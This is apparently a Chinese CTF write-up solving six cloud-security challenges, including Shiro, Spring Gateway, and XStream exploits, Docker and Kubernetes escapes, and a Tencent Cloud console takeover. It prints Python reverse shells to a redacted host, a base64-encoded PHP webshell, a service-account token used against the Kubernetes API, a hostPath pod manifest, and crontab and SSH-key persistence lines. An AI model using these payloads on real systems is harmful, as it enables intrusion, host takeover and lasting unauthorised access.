题目一 云之影:Shiro的秘密
题目信息:
-
命令执行
-
信息收集
-
云服务
解题步骤(包含关键步骤截图:)
- 端口扫描:
2.访问8080端口,指纹识别shiro框架,尝试shiro550 反序列化漏洞
存在漏洞,漏洞利用成功,获取webshell:
获取到遗留的配置文件,base64解码:
直接访问显示AccesDenied:
根据提示猜想,可能设置了权限,只有入口主机能访问,尝试访问,访问成功:
Flag2 获取成功:
信息收集,查看所有有效用户:
查看ubuntu用户的用户文件夹, 发现db_old文件夹:
发现只有数据库名,没有其他信息:
查看用户的.bash_history 发现敏感操作:
Base64解码获取到密码:
尝试登陆,登陆失败,继续查看.bash_history, 发现另一个端口:
登陆成功:
获取flag3:
题目二 云端回响:Spring的遗憾
题目信息:
Spring 微服务
SDK
腾讯云
解题步骤(包含关键步骤截图:)
端口扫描:
访问8080端口, 指纹识别名没有信息:
尝试目录扫描 获取到目标存在Spring Actuator 未授权访问漏洞,:
访问路径,发现存在gateway,尝试CVE-2022-22947漏洞
Github搜索关键字获取工具:
https://github.com/aodsec/CVE-2022-22947
执行成功:
反弹shell成功:
获取第一个flag:
信息收集,查看ubuntu用户的.bash_history:
执行命令后获取ak和sk:
通过cf利用:
配置ak/sk 选择腾讯云
接管控制台
登陆控制台
查看具体资源,对象存储有资源:
查看cloud-2-flag2对象存储获取flag2:
查看cloud-3-flag3对象存储获取flag3
题目三 云端之影:Docker的双重背叛
题目信息:
Docker 文件管理 逃逸
解题步骤(包含关键步骤截图:)
端口扫描:
访问80端口:
尝试下主页功能,都是无效功能,目录扫描:
存在upload.php,访问尝试, 上传php webshell:
冰蝎链接成功,获取Flag1:
信息收集发现发现,当前环境为docker环境无k8s集群:
CDK信息收集 存在docker.sock 挂载:
反弹shell 手工利用
挂载宿主机根目录。获取宿主机权限,获取flag2:
Docker ps 查看所有容器,发现flag-container-image 镜像的Docker
直接进入对应Docker,获取Flag3
题目四 云端之谜:Docker的隐藏秘密
题目信息:
python后门Docker 逃逸
解题步骤(包含关键步骤截图:)
端口扫描:
访问8080端口:
查看页面源代码:
通过路由获取系统备份:
代码审计发现,系统存在命令执行后门:
列目录获取flag1:
信息收集,当前环境为单docker,无k8s集群:
Python环境不能写webshell,我们直接将CDK下载进去:
收集docker信息 发现存在特权,直接利用特权进行逃逸:
手工确认:
反弹一个shell来深入利用
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xxxxxxx",9999));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
挂载宿主机硬盘到docker里
mkdir /tmp/mnt
mount /dev/sda1 /tmp/mnt
cd /tmp/mnt
查看宿主根目录,获取flag2
因为我们已经获取了宿主机的硬盘权限,直接搜索flag3关键字,即可从宿主机文件系统,读到另一个docker的文件
题目五 云端迷宫:Kubernetes之旅
题目信息:
-
RCE
-
K8s
-
ServiceAccount
解题步骤(包含关键步骤截图:)
直接访问:
http://ngrok.xiaomiqiu123.top:43248/
手工测试后,发现是一个无显的命令执行漏洞:
随意输入命令,报错获取到绝对路径,可以直接写入webshell:
直接echo 写入一个冰蝎马:
echo PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKCWZ1bmN0aW9uIERlY3J5cHQoJGRhdGEpCnsKICAgICRrZXk9ImU0NWUzMjlmZWI1ZDkyNWIiOyAKICAgICRicz0iYmFzZTY0XyIuImRlY29kZSI7CgkkYWZ0ZXI9JGJzKCRkYXRhLiIiKTsKCWZvcigkaT0wOyRpPHN0cmxlbigkYWZ0ZXIpOyRpKyspIHsKICAgIAkkYWZ0ZXJbJGldID0gJGFmdGVyWyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIH0KICAgIHJldHVybiAkYWZ0ZXI7Cn0KCSRwb3N0PURlY3J5cHQoZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0IikpOwogICAgZXZhbCgkcG9zdCk7Cj8+ | base64 -d > /var/www/html/oooooo.php
连接成功:
搜索flag1:
信息收集, 发现我们目前处于一个k8s的pod当中:
cat /proc/1/cgroup
查看env信息
我们查看当前pod的服务账户Token:
eyJhbGciOiJSUzI1NiIsImtpZCI6InNUSExVVHNuaVBocTN5eU1mWEtlbTdNRUlzLVRhblM5dDhiZmJuSlJ1d1EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzI5MTA2NjAxLCJpYXQiOjE2OTc1NzA2MDEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJ3ZWItYXBwLTc3ZmJmNjU3NmItcDR3eGQiLCJ1aWQiOiJlODZiM2I4Zi1iNzlmLTRjMDctODBjZS01Zjk2MmYwOTE0MmQifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6IndlYi1hcHAtc2EiLCJ1aWQiOiJlM2JiOGI4MC02NDk5LTQ1MWItOGZmYi1kNDczMzc0NGQ2MGYifSwid2FybmFmdGVyIjoxNjk3NTc0MjA4fSwibmJmIjoxNjk3NTcwNjAxLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDp3ZWItYXBwLXNhIn0.WtbuPrZpCvttzmBY8BJXzThzBtivxf8GboxNYwpPsMN0XYF5EtA1aGs1hWAWI4zupeV5z-XZWOeulDrkXIB6e1qiMVFvdAZXH6S0O79GlIOd9PwPNgPHDmn3d0Lm1zNFjJN6RVHI50ZvFfZt3W0YuGGnPfEjbX536TWA0DrARV94q976-PtwObjuW-Ef03KRNwTsKCU7x6CoviVidNefwlGmw0w8rkO96dJJqLp97rScy615XkaUrSuT0iHnjXy4iBrXZINcJxSt4SpgKdIdli749YjzN3ivU-iGdbsi6q5S6tehGqAvHJUSdqNOerNhcL0T1eGHcaxBmwAFevzYcA
先获取Service相关信息:
我们通过获取到的token 列一下pod:发现存在utility-pod
curl -s -k -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6InNUSExVVHNuaVBocTN5eU1mWEtlbTdNRUlzLVRhblM5dDhiZmJuSlJ1d1EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzI5MTA2NjAxLCJpYXQiOjE2OTc1NzA2MDEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJ3ZWItYXBwLTc3ZmJmNjU3NmItcDR3eGQiLCJ1aWQiOiJlODZiM2I4Zi1iNzlmLTRjMDctODBjZS01Zjk2MmYwOTE0MmQifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6IndlYi1hcHAtc2EiLCJ1aWQiOiJlM2JiOGI4MC02NDk5LTQ1MWItOGZmYi1kNDczMzc0NGQ2MGYifSwid2FybmFmdGVyIjoxNjk3NTc0MjA4fSwibmJmIjoxNjk3NTcwNjAxLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDp3ZWItYXBwLXNhIn0.WtbuPrZpCvttzmBY8BJXzThzBtivxf8GboxNYwpPsMN0XYF5EtA1aGs1hWAWI4zupeV5z-XZWOeulDrkXIB6e1qiMVFvdAZXH6S0O79GlIOd9PwPNgPHDmn3d0Lm1zNFjJN6RVHI50ZvFfZt3W0YuGGnPfEjbX536TWA0DrARV94q976-PtwObjuW-Ef03KRNwTsKCU7x6CoviVidNefwlGmw0w8rkO96dJJqLp97rScy615XkaUrSuT0iHnjXy4iBrXZINcJxSt4SpgKdIdli749YjzN3ivU-iGdbsi6q5S6tehGqAvHJUSdqNOerNhcL0T1eGHcaxBmwAFevzYcA" https://10.96.0.1/api/v1/namespaces/default/pods
查看下这个pod的详细信息,发现信息:
curl -s -k -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6InNUSExVVHNuaVBocTN5eU1mWEtlbTdNRUlzLVRhblM5dDhiZmJuSlJ1d1EifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzI5MTA2NjAxLCJpYXQiOjE2OTc1NzA2MDEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJ3ZWItYXBwLTc3ZmJmNjU3NmItcDR3eGQiLCJ1aWQiOiJlODZiM2I4Zi1iNzlmLTRjMDctODBjZS01Zjk2MmYwOTE0MmQifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6IndlYi1hcHAtc2EiLCJ1aWQiOiJlM2JiOGI4MC02NDk5LTQ1MWItOGZmYi1kNDczMzc0NGQ2MGYifSwid2FybmFmdGVyIjoxNjk3NTc0MjA4fSwibmJmIjoxNjk3NTcwNjAxLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDp3ZWItYXBwLXNhIn0.WtbuPrZpCvttzmBY8BJXzThzBtivxf8GboxNYwpPsMN0XYF5EtA1aGs1hWAWI4zupeV5z-XZWOeulDrkXIB6e1qiMVFvdAZXH6S0O79GlIOd9PwPNgPHDmn3d0Lm1zNFjJN6RVHI50ZvFfZt3W0YuGGnPfEjbX536TWA0DrARV94q976-PtwObjuW-Ef03KRNwTsKCU7x6CoviVidNefwlGmw0w8rkO96dJJqLp97rScy615XkaUrSuT0iHnjXy4iBrXZINcJxSt4SpgKdIdli749YjzN3ivU-iGdbsi6q5S6tehGqAvHJUSdqNOerNhcL0T1eGHcaxBmwAFevzYcA" https://10.96.0.1/api/v1/namespaces/default/pods/utility-pod-7bf9988594-x9ls4
Flag2 和Flag3 都在这个pod里,所以我们的目的就是横向到这个pod
- 下载kubectl到pod中,直接指定信息操作
通过命令指定token以及对应的api的地址,进行远程操控pod.横向到目标pod即可:
- 查看POD
kubectl get pods --server=https://<api-server-url> --token=<Service Account Token>
- 操作POD:
kubectl exec -it utility-pod bash --server=https://<api-server-url> --token=<Service Account Token>
后续可以继续利用,权限足够的话:
创建特权pod 挂载实体机/ 到 特权pod的 /mnt
kubectl apply -f app.yaml --server=https://<api-server-url> --token=<Service Account Token>
- app.yaml
apiVersion: v1
kind: Pod
metadata:
name: app
spec:
containers:
- image: nginx
name: test-container
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
进入我们创建的特权token 进/mnt 目录
- kubectl exec -it app /bin/bash --server=https://
--token=
后渗透:
// 1. 向 crontab 写入反弹 shell 的定时任务
# echo -e "* * * * * root bash -i >& /dev/tcp/x.x.x.x/8888 0>&1n" >> /mnt/etc/crontab
// 2. 写入SSH公钥直接连接:
echo "ssh-rsa 123" >> /mnt/root/.ssh/authorized_keys
题目六 环环相扣
题目信息:
某个应用的备份文件存在泄漏,泄漏在了COS上,已知信息如下:
服务商: 腾讯云
前缀: backupdata-1318326636
位置:ap-shanghai
文件名:app-pom.xml
Xstream
RCE
Docker
解题步骤(包含关键步骤截图:)
通过题目的提示我们能猜出目标的COS地址:
https://backupdata-1318326636.cos.ap-shanghai.myqcloud.com/
根据提示构造下文件名,获取到文件内容,注释包含一个IP,看文件接口是java系统的Mvn的pom.xml文件:
从配置文件获取的 依赖有springBoot以及Xstream
端口扫描下注释里的IP地址:
访问端口8080:
随便构造一个xml 爆500 猜测可能直接是通过Content-Type来直接解析xml:
再搜索下xstream 1.4.15 存在哪些漏洞,获取的信息如下:
符合版本的漏洞如下:
| XStream 远程代码执行漏洞 | CVE-2021-21344 | XStream: <= 1.4.15 |
| ------------------------ | ------------------------------------------------------------ | -------------------- |
| XStream 远程代码执行漏洞 | CVE-2021-21345 | XStream: <= 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21346 | XStream: <= 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21347 | XStream<= 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21350 | XStream: <= 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-21351 | XStream: <= 1.4.15 |
| XStream 远程代码执行漏洞 | CVE-2021-29505 | XStream: <= 1.4.16 |
我们尝试了几个,发现CVE-2021-21351 可以利用, 打JNDI 利用链使用spring依赖的
通过python3来反弹shell:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xxxxxx",9999));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
反弹成功,获取第二个flag
信息收集 本机docker有Flag3:
进入docker获取flag3:
